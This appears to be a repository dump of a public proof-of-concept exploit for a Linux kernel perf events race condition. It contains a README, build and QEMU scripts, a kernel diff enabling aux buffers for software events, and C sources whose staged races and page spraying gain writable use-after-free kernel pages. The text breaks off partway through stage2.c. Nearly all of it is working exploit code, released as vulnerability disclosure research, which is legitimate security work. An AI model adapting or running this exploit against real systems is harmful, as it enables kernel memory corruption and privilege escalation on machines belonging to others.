├── Makefile ├── README.md ├── basic_linux_env ├── build.sh ├── bzImage ├── host │ ├── .gitkeep │ └── exploit ├── initramfs ├── mainline.diff └── run_qemu.sh ├── exploit.c ├── exploit.h ├── perf.c ├── perf.h ├── race_util.c ├── race_util.h ├── stage1.c ├── stage2.c ├── stage3.c ├── util.c └── util.h /Makefile: -------------------------------------------------------------------------------- 1 | CC=gcc 2 | 3 | SOURCE_FILES = exploit.c util.c perf.c stage1.c stage2.c stage3.c race_util.c 4 | OBJ_FILES = $(patsubst %.c,%.o,$(SOURCE_FILES)) 5 | 6 | CFLAGS = -static -pthread 7 | COBJFLAGS = $(CFLAGS) -c 8 | LDFLAGS = 9 | EXEC_NAME = exploit 10 | 11 | %.o: %.c 12 | $(CC) $^ $(COBJFLAGS) -o $@ 13 | 14 | $(EXEC_NAME): $(OBJ_FILES) 15 | $(CC) $(CFLAGS) $(LDFLAGS) $^ -o $@ 16 | 17 | run: $(EXEC_NAME) 18 | cp $(EXEC_NAME) ./basic_linux_env/host/exploit 19 | cd ./basic_linux_env && ./run_qemu.sh 20 | 21 | clean: 22 | rm ./*.o 23 | rm $(EXEC_NAME) -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ## perf event race condition PoC 2 | This repository demonstrates that the race condition found by Ole (@firzen14) in `perf events` reported to the linux kernel security team is exploitable. 3 | The PoC gains **multiple writable pages** of UAF kernel memory when it succeeds. 4 | 5 | The **patch** for the bug can be found [here](https://lkml.org/lkml/2024/9/5/544). 6 | 7 | The accompanying **blog post** can be found [here](https://binarygecko.com/blog). 8 | 9 | ### Notes 10 | This vulnerability is ordinarily only exploitable on real hardware, due to software `PMU`s not supporting `aux` buffers. 11 | But because all major distributions mitigate the page corruption technique used in this PoC, you will either **crash** your system or see a lot of `bad page` entries in `dmesg` if you run it on your machine. 
12 | 13 | It is **recommended** to try this in a **virtual machine** with a **modified mainline kernel** that has been patched to enable `aux` buffers for software events. 14 | 15 | ### Quick Start 16 | * Have `qemu-system-x86_64` installed. 17 | * Run `make run`. 18 | * Inside the VM, press the Up arrow key to recall `/mnt/host/exploit` from the shell history and run it. 19 | 20 | ### Structure 21 | The `basic_linux_env` directory contains: 22 | * `bzImage`: a build of a modified `6.9-rc1` kernel, as described in the `mainline.diff` file. You can replace this with your own kernel build. 23 | * `initramfs`: a `busybox`-based `initramfs` that mounts the `host` directory and has `/mnt/host/exploit` in the command history. 24 | * `mainline.diff`: contains an example of how `aux` buffers can be enabled for software events. 25 | 26 | The `Makefile` contains a `make run` command that assumes that you have `qemu-system-x86_64` installed. 27 | It will run `qemu` with the `bzImage` kernel and the `initramfs`. 28 | -------------------------------------------------------------------------------- /basic_linux_env/build.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | echo "Building initramfs" 3 | cd basic_initfs 4 | ./build.sh 5 | cd .. 
-------------------------------------------------------------------------------- /basic_linux_env/bzImage: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Binary-Gecko/perf_PoC/fdd9cdf61c12c3ab69806ee4d1e27eabcab88465/basic_linux_env/bzImage -------------------------------------------------------------------------------- /basic_linux_env/host/.gitkeep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Binary-Gecko/perf_PoC/fdd9cdf61c12c3ab69806ee4d1e27eabcab88465/basic_linux_env/host/.gitkeep -------------------------------------------------------------------------------- /basic_linux_env/host/exploit: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Binary-Gecko/perf_PoC/fdd9cdf61c12c3ab69806ee4d1e27eabcab88465/basic_linux_env/host/exploit -------------------------------------------------------------------------------- /basic_linux_env/initramfs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Binary-Gecko/perf_PoC/fdd9cdf61c12c3ab69806ee4d1e27eabcab88465/basic_linux_env/initramfs -------------------------------------------------------------------------------- /basic_linux_env/mainline.diff: -------------------------------------------------------------------------------- 1 | diff --git a/kernel/events/core.c b/kernel/events/core.c 2 | index 724e6d7e128f..0192d0002d73 100644 3 | --- a/kernel/events/core.c 4 | +++ b/kernel/events/core.c 5 | @@ -10066,11 +10066,32 @@ static int perf_swevent_init(struct perf_event *event) 6 | return 0; 7 | } 8 | 9 | +static void *perf_swevent_setup_aux(struct perf_event *event, void **pages, 10 | + int nr_pages, bool overwrite) 11 | +{ 12 | + void *buf; 13 | + if(event->attr.config == PERF_COUNT_SW_DUMMY) 14 | + return NULL; 15 | + 16 | + buf = kzalloc(sizeof(*buf), 
GFP_KERNEL); 17 | + if (!buf) 18 | + return NULL; 19 | + 20 | + return buf; 21 | +} 22 | + 23 | +static void perf_swevent_free_aux(void *aux) 24 | +{ 25 | + void *buf = aux; 26 | + kfree(buf); 27 | +} 28 | + 29 | static struct pmu perf_swevent = { 30 | .task_ctx_nr = perf_sw_context, 31 | 32 | .capabilities = PERF_PMU_CAP_NO_NMI, 33 | - 34 | + .setup_aux = perf_swevent_setup_aux, 35 | + .free_aux = perf_swevent_free_aux, 36 | .event_init = perf_swevent_init, 37 | .add = perf_swevent_add, 38 | .del = perf_swevent_del, 39 | -------------------------------------------------------------------------------- /basic_linux_env/run_qemu.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | qemu-system-x86_64 \ 3 | -m 4096\ 4 | -smp 8\ 5 | -kernel bzImage\ 6 | -append 'console=ttyS0'\ 7 | -initrd initramfs\ 8 | -virtfs local,path=./host,mount_tag=host,security_model=passthrough,id=host\ 9 | -nographic\ 10 | -serial mon:stdio 11 | #-gdb tcp::1234 12 | -------------------------------------------------------------------------------- /exploit.c: -------------------------------------------------------------------------------- 1 | #define _GNU_SOURCE 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | 12 | #include 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include "exploit.h" 18 | 19 | struct exp_sync *global_exp_data = NULL; 20 | 21 | //The child process holds on to all of the broken references 22 | //If the spray fails the child can be orphaned and the parent can exit cleanly 23 | //and just leak some memory without crashing the system 24 | int proc_child() 25 | { 26 | assignToThisCore(1); 27 | stage1_child((void*)(uint64_t)global_exp_data->fd2); 28 | if(!global_exp_data->stage1.success) 29 | { 30 | fprintf(stderr, "[C] First stage failed, bailing\n"); 31 | return -1; 32 | } 33 | global_exp_data->stage2.extra_vma = 
global_exp_data->stage1.extra_vma; 34 | stage2_child((void*)(uint64_t)global_exp_data->fd2); 35 | if(!global_exp_data->stage2.success) 36 | { 37 | fprintf(stderr, "[C] Second stage failed, bailing\n"); 38 | return -1; 39 | } 40 | global_exp_data->stage3.mapped_start = global_exp_data->stage2.mapped_start; 41 | global_exp_data->stage3.mapped_end = global_exp_data->stage2.mapped_end; 42 | stage3_child(); 43 | return 0; 44 | } 45 | 46 | int proc_parent() 47 | { 48 | unsigned long vma_size = TARGET_RB_SIZE; 49 | void* mapped = mmap(0, vma_size, PROT_READ|PROT_WRITE,MAP_SHARED, global_exp_data->fd1, 0); 50 | if(mapped == MAP_FAILED) 51 | perror_exit("mmap"); 52 | 53 | if(ioctl(global_exp_data->fd2, PERF_EVENT_IOC_SET_OUTPUT, global_exp_data->fd1)<0) 54 | perror_exit("set_output ioctl"); 55 | printf("[+] redirected event2->event1\n"); 56 | 57 | struct perf_event_mmap_page *user_page = mapped; 58 | user_page->aux_offset = TARGET_AUX_OFFSET; 59 | user_page->aux_size = TARGET_AUX_SIZE; 60 | 61 | assignToThisCore(0); 62 | 63 | stage1_parent((void*)(uint64_t)global_exp_data->fd1); 64 | if(!global_exp_data->stage1.success) 65 | { 66 | printf("[P] First stage failed, bailing\n"); 67 | exit(-1); 68 | } 69 | 70 | 71 | user_page->aux_size = TARGET_AUX_UNMAP_SIZE; 72 | stage2_parent((void*)(uint64_t)global_exp_data->fd1); 73 | if(!global_exp_data->stage2.success) 74 | { 75 | printf("[P] Second stage failed, bailing\n"); 76 | exit(-1); 77 | } 78 | 79 | stage3_parent(); 80 | 81 | 82 | printf("[P] Found %d writable page(s) in %d iterations\n", global_exp_data->stage3.writable_page_count, global_exp_data->stage3.num_iterations); 83 | 84 | //Clear up the sprayed pages we didn't find first 85 | //So that when we cause the UAF of the pages we DID find 86 | //they will be the most recently freed ones 87 | for(int i=0; istage3, NULL, i)) 90 | { 91 | munmap((void*)global_exp_data->stage3.spray_infos[i].map, STAGE3_MMAP_SIZE); 92 | close(global_exp_data->stage3.spray_infos[i].fd); 93 | 
global_exp_data->stage3.spray_infos[i].fd = -1; 94 | } 95 | } 96 | 97 | //If we didn't find any writable pages we exit the parent and we keep the child process 98 | //alive, so that we don't crash the kernel 99 | if(!global_exp_data->stage3.writable_page_count) 100 | { 101 | fprintf(stderr, "Couldn't find any writable pages. Will leave child process alive to avoid system instability\n"); 102 | exit(0); 103 | } 104 | 105 | printf("[P] Doing refcount manipulation\n"); 106 | for(int i=0; istage3.writable_page_count; i++) 107 | { 108 | //Unmap page from vma, but keep vma alive 109 | int idx = global_exp_data->stage3.writable_pages[i].page_index; 110 | madvise((void*)global_exp_data->stage3.spray_infos[idx].map,PAGE_SIZE, MADV_DONTNEED); 111 | void* new_map = (void*)global_exp_data->stage3.spray_infos[idx].map; 112 | 113 | if(new_map==MAP_FAILED) 114 | { 115 | perror_exit("mmap writable rb"); 116 | } 117 | global_exp_data->stage3.writable_pages[i].writable_page=new_map; 118 | } 119 | 120 | /************************************************************************************************************************************ 121 | * THIS IS THE END OF THE WRITEUP 122 | * ================================================================================================================================== 123 | * The rest of the PoC just does some trivial spraying and scanning of the pages we found to demonstrate that pages are indeed reused 124 | ***********************************************************************************************************************************/ 125 | printf("[P] Checking for change and spraying\n"); 126 | int done = 0; 127 | int spray_fds2[100][2] = {0}; 128 | while(!done) 129 | { 130 | //Spraying some kernel structures so that we can see if the kernel reuses them 131 | for(int i=0; i<100; i++) 132 | pipe(spray_fds2[i]); 133 | 134 | for(int i=0; istage3.writable_page_count; i++) 135 | { 136 | char* curr = 
(char*)global_exp_data->stage3.writable_pages[i].writable_page; 137 | int idx = global_exp_data->stage3.writable_pages[i].page_index; 138 | for(char* s=curr; s(1ULL<<63)) 142 | { 143 | printf("[P] Writable page changed\n"); 144 | //Adjust this if you want to print more or less 145 | hexdump(curr, PAGE_SIZE/4); 146 | done=1; 147 | break; 148 | } 149 | } 150 | if(done) 151 | break; 152 | } 153 | for(int i=0; i<100; i++) 154 | if(spray_fds2[i][0]>=0) 155 | { 156 | close(spray_fds2[i][0]); 157 | close(spray_fds2[i][1]); 158 | } 159 | } 160 | 161 | printf("[P] Main thread done\n"); 162 | printf("[P] Spinning\n"); 163 | while(1){} 164 | } 165 | //Maps the anonymous MAP_SHARED exp_sync block, zeroes it, stores both event fds, seeds the stage 1 delay window and initializes every stage barrier for NUM_RACERS waiters. Returns 0; an mmap failure is handed to perror_exit. 166 | int shared_setup(int perf_fd, int perf_fd2) 167 | { 168 | global_exp_data = mmap(0,sizeof(*global_exp_data), PROT_READ|PROT_WRITE,MAP_ANON|MAP_SHARED,-1,0); 169 | if(global_exp_data==MAP_FAILED) 170 | perror_exit("exp_data mmap"); 171 | 172 | memset(global_exp_data,0, sizeof(*global_exp_data)); 173 | global_exp_data->fd1 = perf_fd; 174 | global_exp_data->fd2 = perf_fd2; 175 | global_exp_data->stage1.usec_delay = RACE_DELAY_AVG; 176 | global_exp_data->stage1.usec_delay_max = RACE_DELAY_AVG+RACE_DELAY_RANGE; 177 | global_exp_data->stage1.usec_delay_min = RACE_DELAY_AVG-RACE_DELAY_RANGE; 178 | race_barrier_init(&global_exp_data->stage1.rdy_barrier, NUM_RACERS); 179 | race_barrier_init(&global_exp_data->stage1.result_barrier, NUM_RACERS); 180 | race_barrier_init(&global_exp_data->stage2.rdy_barrier, NUM_RACERS); 181 | race_barrier_init(&global_exp_data->stage2.result_barrier, NUM_RACERS); 182 | race_barrier_init(&global_exp_data->stage3.rdy_barrier, NUM_RACERS); 183 | race_barrier_init(&global_exp_data->stage3.spray_barrier, NUM_RACERS); 184 | race_barrier_init(&global_exp_data->stage3.change_barrier, NUM_RACERS); 185 | race_barrier_init(&global_exp_data->stage3.check_barrier, NUM_RACERS); 186 | race_barrier_init(&global_exp_data->stage3.result_barrier, NUM_RACERS); 187 | return 0; 188 | } 189 | 190 | int main(int argc, char* argv[]) 191 
| { 192 | printf("[+] Opening event fd\n"); 193 | int perf_fd = get_aux_mappable_fd(); 194 | if(perf_fd<0) 195 | { 196 | printf("[-] Couldn't find aux mappable event_pmu\n"); 197 | exit(-1); 198 | } 199 | //Second event fd doesn't need to be aux mappable at all, in fact it shouldn't be for the oracle to work 200 | //So just open the software dummy event 201 | struct perf_event_attr attrs = {0}; 202 | memset((char*)&attrs,0,sizeof(attrs)); 203 | attrs.size = sizeof(attrs); 204 | attrs.disabled = 1; 205 | attrs.exclude_kernel = 1; 206 | attrs.exclude_hv = 1; 207 | attrs.type = PERF_TYPE_SOFTWARE; 208 | attrs.config = PERF_COUNT_SW_DUMMY; 209 | int perf_fd2 = perf_event_open(&attrs,0,-1,-1,0); 210 | if(perf_fd2<0) 211 | { 212 | printf("[-] ret=%d\n",perf_fd2); 213 | perror_exit("[-] perf_event_open 2"); 214 | } 215 | printf("[+] Opened event fds\n"); 216 | 217 | shared_setup(perf_fd, perf_fd2); 218 | 219 | if(fork()==0) 220 | { 221 | if(proc_child()) 222 | { 223 | exit(-1); 224 | } 225 | printf("[C] Spinning\n"); 226 | while(1){ 227 | sleep(60); 228 | } 229 | exit(0); 230 | } 231 | else 232 | { 233 | if(proc_parent()) 234 | { 235 | exit(-1); 236 | } 237 | } 238 | } 239 | -------------------------------------------------------------------------------- /exploit.h: -------------------------------------------------------------------------------- 1 | #ifndef __EXPLOIT_H__ 2 | #define __EXPLOIT_H__ 3 | #define _GNU_SOURCE 4 | #include 5 | #include 6 | #include "util.h" 7 | #include "perf.h" 8 | #include "race_util.h" 9 | //Exploit configuration 10 | #define NUM_RACERS 2 11 | #define TARGET_AUX_OFFSET TEST_AUX_OFFSET 12 | #define TARGET_AUX_SIZE 0x8000000 13 | #define TARGET_RB_SIZE 0x1000 14 | 15 | #define PAGE_SIZE 4096 16 | 17 | #define RACE_MAX_FOUND_OFFSET 5 18 | 19 | #define RACE_DELAY_AVG 0 20 | #define RACE_DELAY_RANGE 200 21 | #define RACE_ACCESS_PAGE_DELAY 100000 22 | 23 | #define TARGET_AUX_UNMAP_SIZE 0x8000000 24 | 25 | #define RACE2_STEP_SIZE 100 26 | #define 
RACE2_CATCH_SIZE 0x1000 27 | #define RACE2_SAFETY_BUFFER_SIZE 0x8000 28 | 29 | #define STAGE3_VAL1 ((char)(unsigned char)0x7f) 30 | #define STAGE3_MMAP_SIZE PAGE_SIZE 31 | //How many pages or what fraction are we trying to find 32 | #define STAGE3_ABS_THRESHOLD 64 33 | #define STAGE3_MAX_ITERATIONS 100 34 | #define STAGE3_MIN_ITERATIONS 20 35 | 36 | #define SPRAY_NUM 100 37 | 38 | //Bookkeeping for exploit stages and synchronization for IPC 39 | struct exp_sync_stage1 40 | { 41 | struct race_barrier rdy_barrier; 42 | struct race_barrier result_barrier; 43 | volatile int mapped; 44 | volatile int race_mapped; 45 | volatile int redirected; 46 | volatile int caught_sigbus; 47 | volatile int usec_delay; 48 | volatile int usec_delay_min; 49 | volatile int usec_delay_max; 50 | volatile int race_done; 51 | volatile int race_counter; 52 | volatile int success; 53 | volatile void* extra_vma; 54 | }; 55 | 56 | struct exp_sync_stage2 57 | { 58 | struct race_barrier rdy_barrier; 59 | struct race_barrier result_barrier; 60 | 61 | volatile void* extra_vma; 62 | volatile int success; 63 | volatile int race_done; 64 | volatile void* faulted; 65 | volatile void* mapped_start; 66 | volatile void* mapped_end; 67 | volatile int caught_sigbus; 68 | 69 | volatile int mapped; 70 | 71 | volatile int usec_delay; 72 | volatile int usec_delay_min; 73 | volatile int usec_delay_max; 74 | }; 75 | 76 | struct writable_page_info 77 | { 78 | volatile int page_index; 79 | volatile void* writable_page; 80 | }; 81 | 82 | struct spray_map_info 83 | { 84 | volatile int fd; 85 | volatile void* map; 86 | }; 87 | 88 | struct exp_sync_stage3 89 | { 90 | volatile void* mapped_start; 91 | volatile void* mapped_end; 92 | 93 | struct race_barrier rdy_barrier; 94 | struct race_barrier spray_barrier; 95 | struct race_barrier change_barrier; 96 | struct race_barrier check_barrier; 97 | struct race_barrier result_barrier; 98 | 99 | volatile int spraying; 100 | volatile int spray_done; 101 | volatile int scanning; 
102 | volatile int scan_done; 103 | volatile int req_change; 104 | volatile int change_done; 105 | volatile int finished; 106 | 107 | volatile int total_page_count; 108 | 109 | volatile int num_iterations; 110 | struct writable_page_info writable_pages[STAGE3_ABS_THRESHOLD]; 111 | 112 | volatile int writable_page_count; 113 | struct spray_map_info spray_infos[SPRAY_NUM]; 114 | }; 115 | 116 | struct exp_sync 117 | { 118 | int fd1; 119 | int fd2; 120 | struct exp_sync_stage1 stage1; 121 | struct exp_sync_stage2 stage2; 122 | struct exp_sync_stage3 stage3; 123 | }; 124 | extern struct exp_sync *global_exp_data; 125 | void* stage1_parent(void* args); 126 | void* stage1_child(void* args); 127 | void* stage2_parent(void* args); 128 | void* stage2_child(void* args); 129 | void stage3_parent(); 130 | void stage3_child(); 131 | int page_already_found(struct exp_sync_stage3 *exp_data, void* addr, int idx); 132 | #endif -------------------------------------------------------------------------------- /perf.c: -------------------------------------------------------------------------------- 1 | #include "perf.h" 2 | #include 3 | #include 4 | 5 | //wrapper since glibc doesn't provide it themselves 6 | int perf_event_open(struct perf_event_attr* attr, pid_t pid, int cpu, int group_fd, unsigned long flags) 7 | { 8 | return syscall(SYS_perf_event_open, attr, pid, cpu, group_fd, flags); 9 | } 10 | 11 | //helper function that searches for an aux mappable PMU 12 | int get_aux_mappable_fd() 13 | { 14 | for(int t = 0; taux_offset = TEST_AUX_OFFSET; 39 | user_page->aux_size = 0x1000; 40 | void* aux_mapped = mmap(0, 0x1000, PROT_READ, MAP_SHARED, perf_fd, TEST_AUX_OFFSET); 41 | if(aux_mapped != MAP_FAILED) 42 | { 43 | printf("[+] Found aux mappable pmu: t=%d, c=%d\n", t, c); 44 | //Close additional mappings and original event fd 45 | //and return new fd of same type and config 46 | munmap(mapped, 0x1000); 47 | munmap(aux_mapped, 0x1000); 48 | close(perf_fd); 49 | return 
perf_event_open(&attrs,0,-1,-1,0);; 50 | } 51 | munmap(mapped, 0x1000); 52 | close(perf_fd); 53 | } 54 | } 55 | return -1; 56 | } -------------------------------------------------------------------------------- /perf.h: -------------------------------------------------------------------------------- 1 | #ifndef __PERF_H__ 2 | #define __PERF_H__ 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #define MAX_ENUM_TYPE 20 9 | #define MAX_ENUM_CONFIG 20 10 | #define TEST_AUX_OFFSET 0x2000 11 | 12 | int perf_event_open(struct perf_event_attr* attr, pid_t pid, int cpu, int group_fd, unsigned long flags); 13 | int get_aux_mappable_fd(); 14 | #endif -------------------------------------------------------------------------------- /race_util.c: -------------------------------------------------------------------------------- 1 | #define _GNU_SOURCE 2 | #include "race_util.h" 3 | #include 4 | #include 5 | #include 6 | int race_barrier_init(struct race_barrier* barrier, int total_waiters) 7 | { 8 | memset(barrier, 0, sizeof(*barrier)); 9 | pthread_barrierattr_t attr = {0}; 10 | pthread_barrierattr_init(&attr); 11 | pthread_barrierattr_setpshared(&attr, 1); 12 | pthread_barrier_init(&barrier->barrier,&attr,total_waiters); 13 | return 0; 14 | } 15 | 16 | int race_barrier_wait_or_abort(struct race_barrier* barrier, volatile int* abort_mem) 17 | { 18 | return pthread_barrier_wait(&barrier->barrier); 19 | } 20 | 21 | int race_signal_set(race_signal_t* signal) 22 | { 23 | if(*signal==SIGNAL_STATE_SET) 24 | return -1; 25 | *signal = SIGNAL_STATE_SET; 26 | return 0; 27 | } 28 | 29 | int race_signal_set_and_wait(race_signal_t* signal) 30 | { 31 | if(*signal==SIGNAL_STATE_SET) 32 | return -1; 33 | *signal = SIGNAL_STATE_SET; 34 | //Wait for signal to be consumed 35 | while(*signal != SIGNAL_STATE_CONSUMED) 36 | sched_yield(); 37 | *signal = SIGNAL_STATE_UNSET; 38 | return 0; 39 | } 40 | 41 | int race_signal_isset(race_signal_t* signal) 42 | { 43 | return *signal == 
SIGNAL_STATE_SET; 44 | } 45 | //Marks a signal that is currently SET as CONSUMED. Returns 0 on success, -1 (signal left untouched) if it was not SET. 46 | int race_signal_consume(race_signal_t* signal) 47 | { 48 | if(*signal!=SIGNAL_STATE_SET) 49 | return -1; 50 | *signal = SIGNAL_STATE_CONSUMED; 51 | return 0; 52 | } -------------------------------------------------------------------------------- /race_util.h: -------------------------------------------------------------------------------- 1 | #ifndef __RACE_UTIL_H__ 2 | #define __RACE_UTIL_H__ 3 | #include 4 | #define RACE_PARENT 0 5 | #define RACE_CHILD 1 6 | struct race_barrier 7 | { 8 | pthread_barrier_t barrier; 9 | volatile int total_waiters; 10 | volatile int num_waiting; 11 | volatile int num_ready; 12 | volatile int num_running; 13 | }; 14 | 15 | int race_barrier_init(struct race_barrier* barrier, int total_waiters); 16 | int race_barrier_wait_or_abort(struct race_barrier* barrier, volatile int* abort_mem); 17 | #define race_barrier_wait(__barrier) race_barrier_wait_or_abort(__barrier, NULL) 18 | 19 | #define SIGNAL_STATE_UNSET 0 20 | #define SIGNAL_STATE_SET 1 21 | #define SIGNAL_STATE_CONSUMED 2 22 | typedef volatile int race_signal_t; 23 | 24 | int race_signal_set(race_signal_t* signal); 25 | int race_signal_set_and_wait(race_signal_t* signal); 26 | int race_signal_isset(race_signal_t* signal); 27 | int race_signal_consume(race_signal_t* signal); 28 | #endif -------------------------------------------------------------------------------- /stage1.c: -------------------------------------------------------------------------------- 1 | #include "exploit.h" 2 | #include 3 | #include 4 | #include 5 | 6 | /* Stage 1 7 | * This exploit stage performs a race between the unmapping of an aux buffer and the taking of a refcount to the aux buffer in 8 | * perf_mmap. 9 | * If the race is won an additional vma with the correct pgoff will exist without the aux_mmap_count being affected. 
10 | * This will allow arbitrarily freeing the aux buffer while still holding a vma that will try to access aux pages 11 | */ 12 | 13 | static void sigbus_handler(int signum, siginfo_t* si, void* arg) 14 | { 15 | if(signum == SIGBUS) 16 | { 17 | ucontext_t *ctx = (ucontext_t*)arg; 18 | global_exp_data->stage1.caught_sigbus = 1; 19 | //Skip size of the assembly load operation, so that we don't get stuck in an infinite loop of handling sigbus 20 | ctx->uc_mcontext.gregs[REG_RIP]+=3; 21 | } 22 | } 23 | 24 | void* stage1_parent(void* args) 25 | { 26 | int perf_fd = (int)(uint64_t)args; 27 | struct exp_sync_stage1 *exp_data = &global_exp_data->stage1; 28 | printf("[P] Started\n"); 29 | while(!exp_data->race_done) 30 | { 31 | race_barrier_wait(&exp_data->rdy_barrier); 32 | void* mmap_aux = mmap(0, TARGET_AUX_SIZE, PROT_READ|PROT_WRITE,MAP_SHARED, perf_fd, TARGET_AUX_OFFSET); 33 | if(mmap_aux==MAP_FAILED) 34 | { 35 | perror("[P] mmap\n"); 36 | printf("[P] mmap err\n"); 37 | exp_data->mapped = 1; 38 | race_barrier_wait(&exp_data->result_barrier); 39 | continue; 40 | } 41 | exp_data->mapped = 1; 42 | if(exp_data->usec_delay<0) 43 | usleep(-exp_data->usec_delay); 44 | else 45 | usleep(0); 46 | munmap(mmap_aux, TARGET_AUX_SIZE); 47 | race_barrier_wait(&exp_data->result_barrier); 48 | } 49 | return NULL; 50 | } 51 | 52 | void* stage1_child(void* args) 53 | { 54 | struct sigaction sa; 55 | memset(&sa,0, sizeof(sa)); 56 | sigemptyset(&sa.sa_mask); 57 | sa.sa_sigaction = sigbus_handler; 58 | sa.sa_flags = SA_SIGINFO; 59 | sigaction(SIGBUS,&sa, NULL); 60 | int perf_fd2 = (int)(uint64_t)args; 61 | struct exp_sync_stage1 *exp_data = &global_exp_data->stage1; 62 | printf("[C] Started\n"); 63 | while(!exp_data->race_done) 64 | { 65 | if(exp_data->usec_delay_max<=exp_data->usec_delay_min+1 && exp_data->race_counter++ == RACE_MAX_FOUND_OFFSET) 66 | { 67 | exp_data->race_done = 1; 68 | return NULL; 69 | } 70 | race_barrier_wait(&exp_data->rdy_barrier); 71 | while(!exp_data->mapped) 72 | 
;//Busy 73 | exp_data->mapped = 0; 74 | if(exp_data->usec_delay>0) 75 | usleep(exp_data->usec_delay); 76 | else 77 | usleep(0); 78 | 79 | void* mmap_aux2 = mmap(0, TARGET_AUX_SIZE, PROT_READ,MAP_SHARED, perf_fd2, TARGET_AUX_OFFSET); 80 | if(mmap_aux2==MAP_FAILED) 81 | { 82 | //Too late, adjust delay 83 | //ENOMEM should only happen in the vm patched kernel instead of ENOTSUP 84 | if(errno==ENOTSUP || errno==EINVAL || errno==ENOMEM) 85 | { 86 | exp_data->usec_delay_max = exp_data->usec_delay; 87 | exp_data->usec_delay = (exp_data->usec_delay_min+exp_data->usec_delay_max)/2; 88 | } 89 | else 90 | { 91 | printf("[C] Unexpected behaviour\n"); 92 | exp_data->race_done = 1; 93 | race_barrier_wait(&exp_data->result_barrier); 94 | return NULL; 95 | } 96 | race_barrier_wait(&exp_data->result_barrier); 97 | continue; 98 | } 99 | usleep(RACE_ACCESS_PAGE_DELAY); 100 | char test = *(volatile char*)mmap_aux2; 101 | if(!exp_data->caught_sigbus) 102 | { 103 | //Too early, we incremented refcount before free started 104 | exp_data->usec_delay_min = exp_data->usec_delay; 105 | exp_data->usec_delay = (exp_data->usec_delay_min+exp_data->usec_delay_max)/2; 106 | munmap(mmap_aux2, TARGET_AUX_SIZE); 107 | //After munmap our rb will be unset because our events mmap count goes to zero 108 | if(ioctl(global_exp_data->fd2, PERF_EVENT_IOC_SET_OUTPUT, global_exp_data->fd1)<0) 109 | perror_exit("set_output ioctl"); 110 | race_barrier_wait(&exp_data->result_barrier); 111 | continue; 112 | } 113 | if(exp_data->caught_sigbus) 114 | { 115 | printf("[C] Won stage 1 race\n"); 116 | //Won the race 117 | exp_data->race_done = 1; 118 | exp_data->success = 1; 119 | exp_data->extra_vma = mmap_aux2; 120 | race_barrier_wait(&exp_data->result_barrier); 121 | return NULL; 122 | } 123 | race_barrier_wait(&exp_data->result_barrier); 124 | } 125 | } -------------------------------------------------------------------------------- /stage2.c: 
-------------------------------------------------------------------------------- 1 | #include "exploit.h" 2 | #include 3 | #include 4 | 5 | /* Stage 2 6 | * This exploit stage performs a race between the unmapping of an aux buffer and the page fault handler accessing the 7 | * array of pages. 8 | * If the race is won a range of pages that have been returned to the page allocator are going to be mapped in user space. 9 | * This mapping is read only, but it allows freeing a page from an unexpected vma. 10 | */ 11 | 12 | static void sigbus_handler(int signum, siginfo_t* si, void* arg) 13 | { 14 | if(signum == SIGBUS) 15 | { 16 | ucontext_t *ctx = (ucontext_t*)arg; 17 | global_exp_data->stage2.caught_sigbus = 1; 18 | ctx->uc_mcontext.gregs[REG_RIP]+=3; //Skip size of the assembly load operation 19 | } 20 | } 21 | 22 | void* stage2_parent(void* args) 23 | { 24 | struct exp_sync_stage2 *exp_data = &global_exp_data->stage2; 25 | exp_data->mapped = 0; 26 | int perf_fd = (int)(uint64_t)args; 27 | printf("[P] Unmap Started\n"); 28 | while(!exp_data->race_done) 29 | { 30 | race_barrier_wait(&exp_data->rdy_barrier); 31 | void* mmap_aux = mmap(0, TARGET_AUX_UNMAP_SIZE, PROT_READ|PROT_WRITE,MAP_SHARED, perf_fd, TARGET_AUX_OFFSET); 32 | if(mmap_aux==MAP_FAILED) 33 | { 34 | perror("[P] mmap\n"); 35 | printf("[P] mmap err\n"); 36 | exp_data->mapped = 1; 37 | race_barrier_wait(&exp_data->result_barrier); 38 | continue; 39 | } 40 | exp_data->mapped = 1; 41 | if(exp_data->usec_delay<0) 42 | usleep(-exp_data->usec_delay); 43 | else 44 | usleep(0); 45 | munmap(mmap_aux, TARGET_AUX_UNMAP_SIZE); 46 | exp_data->mapped = 0; 47 | race_barrier_wait(&exp_data->result_barrier); 48 | } 49 | return NULL; 50 | } 51 | 52 | void* stage2_child(void* args) 53 | { 54 | struct sigaction sa; 55 | memset(&sa,0, sizeof(sa)); 56 | sigemptyset(&sa.sa_mask); 57 | sa.sa_sigaction = sigbus_handler; 58 | sa.sa_flags = SA_SIGINFO; 59 | sigaction(SIGBUS,&sa, NULL); 60 | 61 | struct exp_sync_stage2 *exp_data = 
&global_exp_data->stage2; 62 | int perf_fd2 = (int)(uint64_t)args; 63 | exp_data->caught_sigbus = 0; 64 | exp_data->usec_delay = RACE_DELAY_AVG; 65 | printf("[C] Unmap Fault Started\n"); 66 | while(!exp_data->race_done) 67 | { 68 | race_barrier_wait(&exp_data->rdy_barrier); 69 | while(!exp_data->mapped) 70 | ;//Busy 71 | exp_data->mapped = 0; 72 | if(exp_data->usec_delay>0) 73 | usleep(exp_data->usec_delay); 74 | else 75 | usleep(0); 76 | 77 | void* mmap_aux2 = (void*)exp_data->extra_vma; 78 | //Target aux size is smaller than unmap size 79 | void* mmap_aux_end = mmap_aux2+TARGET_AUX_SIZE-PAGE_SIZE; 80 | void* mmap_aux_curr = mmap_aux_end; 81 | 82 | mmap_aux2 += RACE2_SAFETY_BUFFER_SIZE; 83 | //Search backwards from last backed page forward 84 | for(;mmap_aux_curr>=mmap_aux2; mmap_aux_curr-=PAGE_SIZE) 85 | { 86 | char test = *(volatile char*)mmap_aux_curr; 87 | if(exp_data->caught_sigbus) 88 | { 89 | break; 90 | } 91 | } 92 | //If we immediately caught sigbus, we are too late 93 | if(exp_data->caught_sigbus && mmap_aux_curr==mmap_aux_end) 94 | { 95 | //Lost, reset the sigbus flag and adjust offset 96 | exp_data->caught_sigbus = 0; 97 | exp_data->usec_delay-=RACE2_STEP_SIZE; 